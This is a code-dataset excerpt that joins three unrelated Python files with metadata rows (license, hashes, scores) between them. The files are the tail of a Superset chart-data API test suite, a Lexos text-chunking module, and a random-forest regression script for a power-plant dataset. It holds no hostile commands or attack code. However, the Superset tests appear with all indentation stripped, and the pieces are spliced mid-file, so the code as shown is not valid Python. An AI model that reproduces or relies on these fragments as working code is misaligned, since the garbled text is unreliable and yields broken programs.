rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(data["result"][0]["rowcount"], 45)
def test_chart_data_applied_time_extras(self):
"""
Chart data API: Test chart data query with applied time extras
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["applied_time_extras"] = {
"__time_range": "100 years ago : now",
"__time_origin": "now",
}
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(
data["result"][0]["applied_filters"],
[{"column": "gender"}, {"column": "__time_range"},],
)
self.assertEqual(
data["result"][0]["rejected_filters"],
[{"column": "__time_origin", "reason": "not_druid_datasource"},],
)
self.assertEqual(data["result"][0]["rowcount"], 45)
def test_chart_data_limit_offset(self):
"""
Chart data API: Test chart data query with limit and offset
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["row_limit"] = 5
request_payload["queries"][0]["row_offset"] = 0
request_payload["queries"][0]["orderby"] = [["name", True]]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 5)
# TODO: fix offset for presto DB
if get_example_database().backend == "presto":
return
# ensure that offset works properly
offset = 2
expected_name = result["data"][offset]["name"]
request_payload["queries"][0]["row_offset"] = offset
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 5)
self.assertEqual(result["data"][0]["name"], expected_name)
@mock.patch(
"superset.common.query_object.config", {**app.config, "ROW_LIMIT": 7},
)
def test_chart_data_default_row_limit(self):
"""
Chart data API: Ensure row count doesn't exceed default limit
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
del request_payload["queries"][0]["row_limit"]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 7)
@mock.patch(
"superset.common.query_context.config", {**app.config, "SAMPLES_ROW_LIMIT": 5},
)
def test_chart_data_default_sample_limit(self):
"""
Chart data API: Ensure sample response row count doesn't exceed default limit
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = utils.ChartDataResultType.SAMPLES
request_payload["queries"][0]["row_limit"] = 10
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 5)
def test_chart_data_incorrect_result_type(self):
"""
Chart data API: Test chart data with unsupported result type
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = "qwerty"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_incorrect_result_format(self):
"""
Chart data API: Test chart data with unsupported result format
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_format"] = "qwerty"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_query_result_type(self):
"""
Chart data API: Test chart data with query result format
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = utils.ChartDataResultType.QUERY
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
def test_chart_data_csv_result_format(self):
"""
Chart data API: Test chart data with CSV result format
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_format"] = "csv"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
def test_chart_data_mixed_case_filter_op(self):
"""
Chart data API: Ensure mixed case filter operator generates valid result
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"][0]["op"] = "In"
request_payload["queries"][0]["row_limit"] = 10
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 10)
def test_chart_data_prophet(self):
"""
Chart data API: Ensure prophet post transformation works
"""
pytest.importorskip("fbprophet")
self.login(username="admin")
request_payload = get_query_context("birth_names")
time_grain = "P1Y"
request_payload["queries"][0]["is_timeseries"] = True
request_payload["queries"][0]["groupby"] = []
request_payload["queries"][0]["extras"] = {"time_grain_sqla": time_grain}
request_payload["queries"][0]["granularity"] = "ds"
request_payload["queries"][0]["post_processing"] = [
{
"operation": "prophet",
"options": {
"time_grain": time_grain,
"periods": 3,
"confidence_interval": 0.9,
},
}
]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
row = result["data"][0]
self.assertIn("__timestamp", row)
self.assertIn("sum__num", row)
self.assertIn("sum__num__yhat", row)
self.assertIn("sum__num__yhat_upper", row)
self.assertIn("sum__num__yhat_lower", row)
self.assertEqual(result["rowcount"], 47)
def test_chart_data_query_missing_filter(self):
"""
Chart data API: Ensure filter referencing missing column is ignored
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"] = [
{"col": "non_existent_filter", "op": "==", "val": "foo"},
]
request_payload["result_type"] = utils.ChartDataResultType.QUERY
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
response_payload = json.loads(rv.data.decode("utf-8"))
assert "non_existent_filter" not in response_payload["result"][0]["query"]
def test_chart_data_no_data(self):
"""
Chart data API: Test chart data with empty result
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"] = [
{"col": "gender", "op": "==", "val": "foo"}
]
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]
self.assertEqual(result["rowcount"], 0)
self.assertEqual(result["data"], [])
def test_chart_data_incorrect_request(self):
"""
Chart data API: Test chart data with invalid SQL
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["queries"][0]["filters"] = []
        # erroneous WHERE clause
request_payload["queries"][0]["extras"]["where"] = "(gender abc def)"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_with_invalid_datasource(self):
"""
Chart data API: Test chart data query with invalid schema
"""
self.login(username="admin")
payload = get_query_context("birth_names")
payload["datasource"] = "abc"
rv = self.post_assert_metric(CHART_DATA_URI, payload, "data")
self.assertEqual(rv.status_code, 400)
def test_chart_data_with_invalid_enum_value(self):
"""
Chart data API: Test chart data query with invalid enum value
"""
self.login(username="admin")
payload = get_query_context("birth_names")
payload["queries"][0]["extras"]["time_range_endpoints"] = [
"abc",
"EXCLUSIVE",
]
rv = self.client.post(CHART_DATA_URI, json=payload)
self.assertEqual(rv.status_code, 400)
def test_query_exec_not_allowed(self):
"""
Chart data API: Test chart data query not allowed
"""
self.login(username="gamma")
payload = get_query_context("birth_names")
rv = self.post_assert_metric(CHART_DATA_URI, payload, "data")
self.assertEqual(rv.status_code, 401)
def test_chart_data_jinja_filter_request(self):
"""
Chart data API: Ensure request referencing filters via jinja renders a correct query
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = utils.ChartDataResultType.QUERY
request_payload["queries"][0]["filters"] = [
{"col": "gender", "op": "==", "val": "boy"}
]
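        # The Jinja macro should resolve to the applied filter value "boy",
        # producing a tautological ('boy' = 'boy') predicate in the generated SQL.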
request_payload["queries"][0]["extras"][
"where"
] = "('boy' = '{{ filter_values('gender', 'xyz' )[0] }}')"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
response_payload = json.loads(rv.data.decode("utf-8"))
result = response_payload["result"][0]["query"]
if get_example_database().backend != "presto":
assert "('boy' = 'boy')" in result
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_async(self):
"""
Chart data API: Test chart data query (async)
"""
async_query_manager.init_app(app)
self.login(username="admin")
request_payload = get_query_context("birth_names")
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 202)
data = json.loads(rv.data.decode("utf-8"))
keys = list(data.keys())
self.assertCountEqual(
keys, ["channel_id", "job_id", "user_id", "status", "errors", "result_url"]
)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_async_results_type(self):
"""
        Chart data API: Test chart data query with non-default result type (async)
"""
async_query_manager.init_app(app)
self.login(username="admin")
request_payload = get_query_context("birth_names")
request_payload["result_type"] = "results"
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_async_invalid_token(self):
"""
        Chart data API: Test chart data query with invalid token (async)
"""
async_query_manager.init_app(app)
self.login(username="admin")
request_payload = get_query_context("birth_names")
test_client.set_cookie(
"localhost", app.config["GLOBAL_ASYNC_QUERIES_JWT_COOKIE_NAME"], "foo"
)
rv = post_assert_metric(test_client, CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 401)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
@mock.patch.object(ChartDataCommand, "load_query_context_from_cache")
def test_chart_data_cache(self, load_qc_mock):
"""
Chart data cache API: Test chart data async cache request
"""
async_query_manager.init_app(app)
self.login(username="admin")
query_context = get_query_context("birth_names")
load_qc_mock.return_value = query_context
orig_run = ChartDataCommand.run
def mock_run(self, **kwargs):
assert kwargs["force_cached"] == True
# override force_cached to get result from DB
return orig_run(self, force_cached=False)
with mock.patch.object(ChartDataCommand, "run", new=mock_run):
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 200)
self.assertEqual(data["result"][0]["rowcount"], 45)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
@mock.patch.object(ChartDataCommand, "load_query_context_from_cache")
def test_chart_data_cache_run_failed(self, load_qc_mock):
"""
Chart data cache API: Test chart data async cache request with run failure
"""
async_query_manager.init_app(app)
self.login(username="admin")
query_context = get_query_context("birth_names")
load_qc_mock.return_value = query_context
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
data = json.loads(rv.data.decode("utf-8"))
self.assertEqual(rv.status_code, 422)
self.assertEqual(data["message"], "Error loading data from cache")
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
@mock.patch.object(ChartDataCommand, "load_query_context_from_cache")
def test_chart_data_cache_no_login(self, load_qc_mock):
"""
Chart data cache API: Test chart data async cache request (no login)
"""
async_query_manager.init_app(app)
query_context = get_query_context("birth_names")
load_qc_mock.return_value = query_context
orig_run = ChartDataCommand.run
def mock_run(self, **kwargs):
assert kwargs["force_cached"] == True
# override force_cached to get result from DB
return orig_run(self, force_cached=False)
with mock.patch.object(ChartDataCommand, "run", new=mock_run):
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
self.assertEqual(rv.status_code, 401)
@mock.patch.dict(
"superset.extensions.feature_flag_manager._feature_flags",
GLOBAL_ASYNC_QUERIES=True,
)
def test_chart_data_cache_key_error(self):
"""
Chart data cache API: Test chart data async cache request with invalid cache key
"""
async_query_manager.init_app(app)
self.login(username="admin")
rv = self.get_assert_metric(
f"{CHART_DATA_URI}/test-cache-key", "data_from_cache"
)
self.assertEqual(rv.status_code, 404)
def test_export_chart(self):
"""
Chart API: Test export chart
"""
example_chart = db.session.query(Slice).all()[0]
argument = [example_chart.id]
uri = f"api/v1/chart/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 200
buf = BytesIO(rv.data)
assert is_zipfile(buf)
def test_export_chart_not_found(self):
"""
Chart API: Test export chart not found
"""
        # if just one of the requested ids does not exist we get a 404
argument = [-1, 1]
uri = f"api/v1/chart/export/?q={prison.dumps(argument)}"
self.login(username="admin")
rv = self.get_assert_metric(uri, "export")
assert rv.status_code == 404
def test_export_chart_gamma(self):
"""
Chart API: Test export chart has gamma
"""
example_chart = db.session.query(Slice).all()[0]
argument = [example_chart.id]
uri = f"api/v1/chart/export/?q={prison.dumps(argument)}"
self.login(username="gamma")
rv = self.client.get(uri)
assert rv.status_code == 404
def test_import_chart(self):
"""
Chart API: Test import chart
"""
self.login(username="admin")
uri = "api/v1/chart/import/"
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
assert database.database_name == "imported_database"
assert len(database.tables) == 1
dataset = database.tables[0]
assert dataset.table_name == "imported_dataset"
assert str(dataset.uuid) == dataset_config["uuid"]
chart = db.session.query(Slice).filter_by(uuid=chart_config["uuid"]).one()
assert chart.table == dataset
db.session.delete(chart)
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_chart_overwrite(self):
"""
Chart API: Test import existing chart
"""
self.login(username="admin")
uri = "api/v1/chart/import/"
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# import again without overwrite flag
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"message": {
"charts/imported_chart.yaml": "Chart already exists and `overwrite=true` was not passed",
}
}
# import with overwrite flag
buf = self.create_chart_import()
form_data = {
"formData": (buf, "chart_export.zip"),
"overwrite": "true",
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 200
assert response == {"message": "OK"}
# clean up
database = (
db.session.query(Database).filter_by(uuid=database_config["uuid"]).one()
)
dataset = database.tables[0]
chart = db.session.query(Slice).filter_by(uuid=chart_config["uuid"]).one()
db.session.delete(chart)
db.session.delete(dataset)
db.session.delete(database)
db.session.commit()
def test_import_chart_invalid(self):
"""
Chart API: Test import invalid chart
"""
self.login(username="admin")
uri = "api/v1/chart/import/"
buf = BytesIO()
with ZipFile(buf, "w") as bundle:
with bundle.open("chart_export/metadata.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_metadata_config).encode())
with bundle.open(
"chart_export/databases/imported_database.yaml", "w"
) as fp:
fp.write(yaml.safe_dump(database_config).encode())
with bundle.open("chart_export/datasets/imported_dataset.yaml", "w") as fp:
fp.write(yaml.safe_dump(dataset_config).encode())
with bundle.open("chart_export/charts/imported_chart.yaml", "w") as fp:
fp.write(yaml.safe_dump(chart_config).encode())
buf.seek(0)
form_data = {
"formData": (buf, "chart_export.zip"),
}
rv = self.client.post(uri, data=form_data, content_type="multipart/form-data")
response = json.loads(rv.data.decode("utf-8"))
assert rv.status_code == 422
assert response == {
"message": {"metadata.yaml": {"type": ["Must be equal to Slice."]}}
}
@pytest.mark.usefixtures("create_annotation_layers")
def test_chart_data_annotations(self):
"""
Chart data API: Test chart data query
"""
self.login(username="admin")
request_payload = get_query_context("birth_names")
annotation_layers = []
request_payload["queries"][0]["annotation_layers"] = annotation_layers
# formula
annotation_layers.append(ANNOTATION_LAYERS[AnnotationType.FORMULA])
# interval
interval_layer = (
db.session.query(AnnotationLayer)
.filter(AnnotationLayer.name == "name1")
.one()
)
interval = ANNOTATION_LAYERS[AnnotationType.INTERVAL]
interval["value"] = interval_layer.id
annotation_layers.append(interval)
# event
event_layer = (
db.session.query(AnnotationLayer)
.filter(AnnotationLayer.name == "name2")
.one()
)
event = ANNOTATION_LAYERS[AnnotationType.EVENT]
event["value"] = event_layer.id
annotation_layers.append(event)
rv = self.post_assert_metric(CHART_DATA_URI, request_payload, "data")
self.assertEqual(rv.status_code, 200)
data = json.loads(rv.data.decode("utf-8"))
# response should only contain interval and event data, not formula
self.assertEqual(len(data["result"][0]["annotation_data"]), 2)
| apache-2.0 | 4,903,939,264,980,543,000 | 36.844242 | 105 | 0.577983 | false |
TheLady/Lexos | processors/prepare/cutter.py | 1 | 14378 | import re
from Queue import Queue
from math import ceil
from types import *
WHITESPACE = ['\n', '\t', ' ', '', u'\u3000']
# from helpers.constants import WHITESPACE
def splitKeepWhitespace(string):
"""
Splits the string on whitespace, while keeping the tokens on which the string was split.
Args:
string: The string to split.
Returns:
The split string with the whitespace kept.
"""
return re.split(u'(\u3000|\n| |\t)', string)
# Note: Regex in capture group keeps the delimiter in the resultant list
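# Illustrative example (added; not in the original source):
#   splitKeepWhitespace(u"two words") -> [u'two', u' ', u'words']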
def countWords(textList): # Ignores WHITESPACE as being 'not words'
"""
Counts the "words" in a list of tokens, where words are anything not in the WHITESPACE global.
Args:
textList: A list of tokens in the text.
Returns:
The number of words in the list.
"""
return len([x for x in textList if x not in WHITESPACE])
def stripLeadingWhiteSpace(q):
"""
Takes in the queue representation of the text and strips the leading whitespace.
Args:
q: The text in a Queue object.
Returns:
None
"""
if not q.empty():
while q.queue[0] in WHITESPACE:
trash = q.get()
if q.empty():
break
def stripLeadingBlankLines(q):
"""
Takes in the queue representation of the text and strips the leading blank lines.
Args:
q: The text in a Queue object.
Returns:
None
"""
    if not q.empty():
        while q.queue[0] == '':
            trash = q.get()
            if q.empty():
                break
def stripLeadingCharacters(charQueue, numChars):
"""
Takes in the queue representation of the text and strips the leading numChars characters.
Args:
charQueue: The text in a Queue object.
numChars: The number of characters to remove.
Returns:
None
"""
for i in xrange(numChars):
removedChar = charQueue.get()
def stripLeadingWords(wordQueue, numWords):
"""
Takes in the queue representation of the text and strips the leading numWords words.
Args:
wordQueue: The text in a Queue object.
numWords: The number of words to remove.
Returns:
None
"""
for i in xrange(numWords):
stripLeadingWhiteSpace(wordQueue)
removedWord = wordQueue.get()
stripLeadingWhiteSpace(wordQueue)
def stripLeadingLines(lineQueue, numLines):
"""
Takes in the queue representation of the text and strips the leading numLines lines.
Args:
lineQueue: The text in a Queue object.
numLines: The number of lines to remove.
Returns:
None
"""
for i in xrange(numLines):
stripLeadingBlankLines(lineQueue)
removedLine = lineQueue.get()
stripLeadingBlankLines(lineQueue)
def cutByCharacters(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of characters,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in characters.
overlap: The number of characters to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
for token in text:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingCharacters(charQueue=chunkSoFar, numChars=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue)
if (float(len(lastChunk)) / chunkSize) < lastProp:
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
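# Worked example (added for illustration; traced by hand, not taken from the
# original source). With chunkSize=4 and overlap=1 the window advances by
# tillNextChunk = 3 characters between chunk starts:
#   cutByCharacters("abcdefghij", 4, 1, 0.5)
#   # -> ['abcd', 'defg', 'ghij']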
def cutByWords(text, chunkSize, overlap, lastProp):
"""
    Cuts the text into equally sized chunks, where the segment size is measured by counts of words,
    with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in words.
overlap: The number of words to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = splitKeepWhitespace(text)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingWords(wordQueue=chunkSoFar, numWords=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByLines(text, chunkSize, overlap, lastProp):
"""
Cuts the text into equally sized chunks, where the segment size is measured by counts of lines,
with an option for an amount of overlap between chunks and a minimum proportion threshold for the last chunk.
Args:
text: The string with the contents of the file.
chunkSize: The size of the chunk, in lines.
overlap: The number of lines to overlap between chunks.
lastProp: The minimum proportional size that the last chunk has to be.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
tillNextChunk = chunkSize - overlap # The distance between the starts of chunks
splitText = text.splitlines(True)
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token == '':
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
stripLeadingLines(lineQueue=chunkSoFar, numLines=tillNextChunk)
currChunkSize -= tillNextChunk
chunkSoFar.put(token)
# Making sure the last chunk is of a sufficient proportion
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
if (float(countWords(lastChunk)) / chunkSize) < lastProp: # If the proportion of the last chunk is too low
if len(chunkList)==0:
chunkList.extend(lastChunk)
else:
chunkList[-1].extend(lastChunk)
else:
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
countSubList = 0
stringList=[]
for subList in chunkList:
stringList.extend([''.join(subList)])
if type(subList) is ListType:
countSubList+=1
# Prevent there isn't subList inside chunkList
if countSubList==0:
stringList = []
stringList.extend([''.join(chunkList)])
return stringList
def cutByNumber(text, numChunks):
"""
Cuts the text into equally sized chunks, where the size of the chunk is determined by the number of desired chunks.
Args:
text: The string with the contents of the file.
numChunks: The number of chunks to cut the text into.
Returns:
A list of string that the text has been cut into.
"""
chunkList = [] # The list of the chunks (a.k.a. a list of list of strings)
chunkSoFar = Queue() # The rolling window representing the (potential) chunk
splitText = splitKeepWhitespace(text)
textLength = countWords(splitText)
chunkSizes = []
for i in xrange(numChunks):
chunkSizes.append(textLength / numChunks)
for i in xrange(textLength % numChunks):
chunkSizes[i] += 1
currChunkSize = 0 # Index keeping track of whether or not it's time to make a chunk out of the window
chunkIndex = 0
chunkSize = chunkSizes[chunkIndex]
# Create list of chunks (chunks are lists of words and whitespace) by using a queue as a rolling window
for token in splitText:
if token in WHITESPACE:
chunkSoFar.put(token)
else:
currChunkSize += 1
if currChunkSize > chunkSize:
chunkList.append(list(chunkSoFar.queue))
chunkSoFar.queue.clear()
currChunkSize = 1
chunkSoFar.put(token)
chunkIndex += 1
chunkSize = chunkSizes[chunkIndex]
else:
chunkSoFar.put(token)
lastChunk = list(chunkSoFar.queue) # Grab the final (partial) chunk
chunkList.append(lastChunk)
# Make the list of lists of strings into a list of strings
stringList = [''.join(subList) for subList in chunkList]
return stringList
def cutByMilestone(text, cuttingValue):
"""
Cuts the file into as many chunks as there are instances of the
substring cuttingValue. Chunk boundaries are made wherever
the string appears.
Args: text -- the text to be chunked as a single string
Returns: A list of strings which are to become the new chunks.
"""
chunkList = [] #container for chunks
lenMS = len(cuttingValue) #length of milestone term
cuttingValue = cuttingValue.encode('utf-8')
if len(cuttingValue) > 0:
chunkstop = text.find(cuttingValue) #first boundary
print len(cuttingValue)
while chunkstop == 0: #trap for error when first word in file is Milestone
text = text[lenMS:]
chunkstop = text.find(cuttingValue)
while chunkstop >= 0: #while next boundary != -1 (while next boundary exists)
print chunkstop
nextchunk = text[:chunkstop-1] #new chunk = current text up to boundary index
text = text[chunkstop+lenMS:] #text = text left after the boundary
chunkstop = text.find(cuttingValue) #first boundary
            while chunkstop == 0:  # trap for error when the milestone appears at the start
                text = text[lenMS:]
                chunkstop = text.find(cuttingValue)
chunkList.append(nextchunk) #append this chunk to chunk list
if len(text) > 0 :
chunkList.append(text)
else:
chunkList.append(text)
return chunkList
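# Illustrative example (added; not part of the original source). Note that the
# text[:chunkstop-1] slice above drops the single character immediately before
# each milestone, so a separating space disappears cleanly:
#   cutByMilestone("aaa MILE bbb MILE ccc", "MILE")
#   # -> ['aaa', ' bbb', ' ccc']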
def cut(text, cuttingValue, cuttingType, overlap, lastProp):
"""
Cuts each text string into various segments according to the options chosen by the user.
Args:
text: A string with the text to be split
cuttingValue: The value by which to cut the texts by.
cuttingType: A string representing which cutting method to use.
overlap: A unicode string representing the number of words to be overlapped between each text segment.
lastProp: A unicode string representing the minimum proportion percentage the last chunk has to be to not get assimilated by the previous.
Returns:
A list of strings, each representing a chunk of the original.
"""
cuttingType = str(cuttingType)
if cuttingType != 'milestone' :
cuttingValue = int(cuttingValue)
overlap = int(overlap)
lastProp = float(lastProp.strip('%')) / 100
if cuttingType == 'letters':
stringList = cutByCharacters(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'words':
stringList = cutByWords(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'lines':
stringList = cutByLines(text, cuttingValue, overlap, lastProp)
elif cuttingType == 'milestone':
stringList = cutByMilestone(text, cuttingValue)
else:
stringList = cutByNumber(text, cuttingValue)
return stringList | mit | 5,435,624,853,086,091,000 | 31.90389 | 146 | 0.648839 | false |
drabastomek/practicalDataAnalysisCookbook | Codes/Chapter06/regression_randomForest.py | 1 | 2303 | # this is needed to load helper from the parent folder
import sys
sys.path.append('..')
# the rest of the imports
import helper as hlp
import pandas as pd
import numpy as np
import sklearn.ensemble as en
import sklearn.cross_validation as cv
@hlp.timeit
def regression_rf(x,y):
'''
Estimate a random forest regressor
'''
# create the regressor object
random_forest = en.RandomForestRegressor(
min_samples_split=80, random_state=666,
max_depth=5, n_estimators=10)
# estimate the model
random_forest.fit(x,y)
# return the object
return random_forest
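# Illustrative usage of the helper above (added for clarity; the variable names
# mirror this script, no real output values are implied):
#   model = regression_rf(x, y)
#   model.score(x, y)              # R**2 on the training data
#   model.feature_importances_     # per-feature importances, inspected further down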
# the file name of the dataset
r_filename = '../../Data/Chapter06/power_plant_dataset_pc.csv'
# read the data
csv_read = pd.read_csv(r_filename)
# select the names of columns
dependent = csv_read.columns[-1]
independent_reduced = [
col
for col
in csv_read.columns
if col.startswith('p')
]
independent = [
col
for col
in csv_read.columns
if col not in independent_reduced
and col not in dependent
]
# split into independent and dependent features
x = csv_read[independent]
y = csv_read[dependent]
# estimate the model using all variables (without PC)
regressor = regression_rf(x,y)
# print out the results
print('R: ', regressor.score(x,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor, x, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x.columns, regressor.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label))
# estimate the model using only the most important feature
features = np.nonzero(regressor.feature_importances_ > 0.001)
x_red = csv_read[features[0]]
regressor_red = regression_rf(x_red,y)
# print out the results
print('R: ', regressor_red.score(x_red,y))
# test the sensitivity of R2
scores = cv.cross_val_score(regressor_red, x_red, y, cv=100)
print('Expected R2: {0:.2f} (+/- {1:.2f})'\
.format(scores.mean(), scores.std()**2))
# print features importance
for counter, (nm, label) \
in enumerate(
zip(x_red.columns, regressor_red.feature_importances_)
):
print("{0}. {1}: {2}".format(counter, nm,label)) | gpl-2.0 | 5,688,512,074,880,824,000 | 24.318681 | 62 | 0.671298 | false |
